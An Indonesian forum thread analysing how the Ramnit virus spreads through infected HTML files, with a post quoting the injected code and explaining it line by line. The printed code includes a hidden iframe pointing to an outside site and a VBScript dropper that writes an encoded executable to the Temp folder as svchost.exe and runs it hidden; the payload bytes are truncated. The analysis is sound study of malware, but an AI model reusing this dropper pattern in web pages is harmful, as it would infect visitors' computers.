.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 Cara Virus Ramnit Menyebar Lewat HTML

Go down 
2 posters
PengirimMessage
zer0cool
Newbie - Hack
Newbie - Hack
zer0cool


Jumlah posting : 363
Points : 807
Reputation : 24
Join date : 22.06.11

Cara Virus Ramnit Menyebar Lewat HTML  Empty
PostSubyek: Cara Virus Ramnit Menyebar Lewat HTML    Cara Virus Ramnit Menyebar Lewat HTML  Icon_minitimeMon Jun 27, 2011 1:10 am

Setelah beberapa virus menghebohkan seperti Stuxnet, Sality, Virut dan Shortcut, kini ada Ramnit yang juga tak kalah canggih. Program jahat ini mampu ‘bekerjasama’ dengan virus lain untuk menginfeksi korbannya.

Ya itulah keunikan Ramnit dibandingkan dengan virus lain. Usai menjangkit komputer korbannya, program jahat ini akan men-download varian virus lainnya.

Dan yang lebih memusingkan, jenis virus yang di-download akan berbeda untuk tiap komputer target baik dari nama maupun ukurannya. Hal inilah yang menyebabkan banyak program antivirus sekalipun kesulitan untuk melakukan deteksi dan pembersihan.
virus ini tidak hanya menyebar melalui internet, tapi juga bisa melalui media lain seperti flashdisk dengan memanfaatkan fungsi Autorun.

Aksi lain yang akan dilakukan oleh virus ini adalah menginjeksi file yang mempunyai ekstensi exe, dll dan htm/html baik file program aplikasi maupun file system Windows. Setiap file yang terinjeksi akan bertambah ukurannya sekitar 107-109 KB
sumber << detikNET


nah, saya mau membuktikan apakah benar dan bagaimana cara virus itu menyebar lewat HTML
setelah kemarin sempat terinfeksi virus ini, masih ada ternyata bekasnya. yah lumayankan buat belajar analisa lagi. kajadiannya gini, semua file html saya bertambah besar (wew, ada apa ini?) setelah aku buka pakai notepad ternyata di bagian bawah ada penambahan code seperti ini


Code:
<iframe style=”height:1px” src=”http://www.Brenz.pl/rc/” frameborder=0 width=1></iframe>
</body>
</html>
<SCRIPT Language=VBScript><!–
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B800000000000000…………………”
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0
//–></SCRIPT><!–’code terenskripsi, gag tau yang ini buat apa’–>


apa sih sebenarnya inti dari code itu, oke akan saya jelaskan sebisa saya

mulai dari bagian depan

Code:
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B800000000000000…………………”
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)


DropFileName adalah sebuah variable yang memuat nama ‘scvhost.exe’
WriteData adalah suatu string panjang (yang itu saya potong) yang mungkin adalah aplikasi virusnya
Set FSO adalah dia memanggil library yang ada di FileSystemObject biasanya digunakan untuk mencari tempat/lokasi
FSo.GetSpecialFolder(2) Special Folder 2 artinya dia mencari tempat di C:\DOCUME~1\[UserName]\LOCALS~1\Temp dan diberi nama DropFileName atau bisa disebut ‘scvhost.exe’ jadi akan menjadi tempat C:\DOCUME~1\[UserName]\LOCALS~1\Temp\scvhost.exe
if FSO… pada code itu dia melacak apakah sudah ada file yang tercipta atau belum, bila belum maka
FSO.CreateTextFile yang artinya dia akan membuat file virus tersebut


Code:
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0


Mulai kode For i sampai Next dia mulai membuat file virus tersebut, dengan mengubah setiap 2 karakter dari String WriteData menjadi 1 karakter supaya menjadi aplikasi. bila dilihat code 4D5A jika diterjemahkan akan manjadi MZ yang artinya itu adalah header dari file executable w32
Set WSHshell = CreateObject(“WScript.Shell”) artinya dia membuat object supaya bisa memanggil exe
WSHshell.Run DropPath, 0 nah inilah code yang digunakan untuk menjalankan virus tersebut dengan Run DropPath artinya dia memanggil file ‘scvhost.exe’ yang ada di Temp dan melarikannya dengan mode Hidden (0)

itulah sedikit analisa saya. semoga bermanfaat
Kembali Ke Atas Go down
Black.exe
Global Mod
Global Mod
Black.exe


Jumlah posting : 844
Points : 1491
Reputation : 44
Join date : 08.01.11
Age : 35

Cara Virus Ramnit Menyebar Lewat HTML  Empty
PostSubyek: Re: Cara Virus Ramnit Menyebar Lewat HTML    Cara Virus Ramnit Menyebar Lewat HTML  Icon_minitimeTue Jul 12, 2011 3:03 am

nice info.... Cara Virus Ramnit Menyebar Lewat HTML  772168924
Kembali Ke Atas Go down
 
Cara Virus Ramnit Menyebar Lewat HTML
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» Cara Menghapus Virus Shortcut
» Stuxnet dan Ramnit Jawara "Virus Bikin Pusing" 2011
» Virus Herpes Perusak Otak Masuknya Lewat Hidung
» CARA MENGHAPUS VIRUS SHORTCUT
» Cara Menghapus virus REGSVR.EXE dan NewFolder.exe (TUNTAS)

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Virus,Malware,Trojan,Worm, Dll-
Navigasi: